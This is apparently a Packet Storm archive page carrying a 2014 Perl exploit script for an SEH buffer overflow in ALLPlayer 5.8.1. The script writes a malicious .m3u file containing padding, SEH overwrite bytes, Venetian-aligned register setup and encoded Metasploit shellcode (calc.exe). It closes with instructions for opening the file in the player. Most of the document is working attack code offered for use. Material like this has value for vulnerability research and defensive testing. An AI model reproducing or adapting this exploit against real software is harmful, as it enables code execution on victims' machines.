exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ALLPlayer 5.8.1 Buffer Overflow

ALLPlayer 5.8.1 Buffer Overflow
Posted Mar 3, 2014
Authored by Gabor Seljan

ALLPlayer version 5.8.1 SEH buffer overflow exploit that creates a malicious .m3u file.

tags | exploit, overflow
SHA-256 | 2b9a546a1e0e23c899b312b4d3da50a553de79acf3ddcf82a6105131f2c0483a

ALLPlayer 5.8.1 Buffer Overflow

Change Mirror Download
#-----------------------------------------------------------------------------#
# Exploit Title: ALLPlayer 5.8.1 - (.m3u) Buffer Overflow (SEH) #
# Date: Mar 1 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.allplayer.org/download/allplayer #
# Version: 5.8.1 #
# Tested on: Windows 7 SP1 #
#-----------------------------------------------------------------------------#

# This application is still vulnerable to a buffer overflow, caused by improper
# bounds checking of an URL given via menu or placed inside an M3U file.
#
# Credit to previous exploits:
# + http://www.exploit-db.com/exploits/29798/ by Mike Czumak
# + http://www.exploit-db.com/exploits/28855/ by metacom

#!/usr/bin/perl

use strict;
use warnings;

my $filename = "sploit.m3u";

my $junk1 = "\x41" x 301; # Offset to SEH
my $nSEH = "\x61\x50"; # POPAD # Venetian padding
my $SEH = "\x50\x45"; # POP POP RET from ALLPlayer.exe
my $junk2 = "\x42" x 700;

my $align = "\x53". # PUSH EBX
"\x6e". # Venetian padding
"\x58". # POP EAX
"\x6e". # Venetian padding
"\x05\x14\x11". # ADD EAX,0x11001400
"\x6e". # Venetian padding
"\x2d\x13\x11". # SUB EAX,0x11001300
"\x6e". # Venetian padding
"\x50". # PUSH EAX
"\x6e". # Venetian padding
"\xc3"; # RET

my $nops = "\x71" x 109;

# msfpayload windows/exec cmd=calc.exe R
# msfencode -e x86/unicode_mixed BufferRegister=EAX
my $shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAh".
"AAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLyXTI9pKPip".
"S02iwuP1z2RDRkb2nP2kNrjlDKnrN4BkD2NHJofWPJLfNQyonQGPDlmloqSLyrNLmPy16ozmYqY7".
"JBzPB2R72kqBLPrkMrmlZaj0Bka0d83UGP1dOZYqvpb04Ka8mH4KR8kpYqyCHcMlQ9DKmdDKM18V".
"nQyolqEpdl91FojmzahGNXk01eYd9s3M8xMk1mmTbUYRr8dKNxldKQWcRFRklLpKBkaHKl9qwc2k".
"itRk9qFp3Yq4O4mT1K1Ks1aI0Zb1KOGpR8QOPZrkMBJKTFqMRJkQBm3UgIipYpypNp38matKpoe7".
"ioyE7KJP85vBQF0heVCeEm3mio7eMlYvsLiz3PikiP45ze7KPGJs1bpoBJKP0SkOiEqSaQBL33ln".
"s5sH2E9pAA";

my $sploit = $junk1.$nSEH.$SEH.$align.$nops.$shellcode.$junk2;

open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE "http://$sploit";
close(FILE);

print "\nExploit file created successfully [$filename]!\n\n";
print "You can either:\n";
print "\t1. Open the created $filename file directly with ALLPlayer\n";
print "\t2. Open the crafted URL via menu by Open movie/sound -> Open URL\n\n";
print "http://$sploit\n";

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close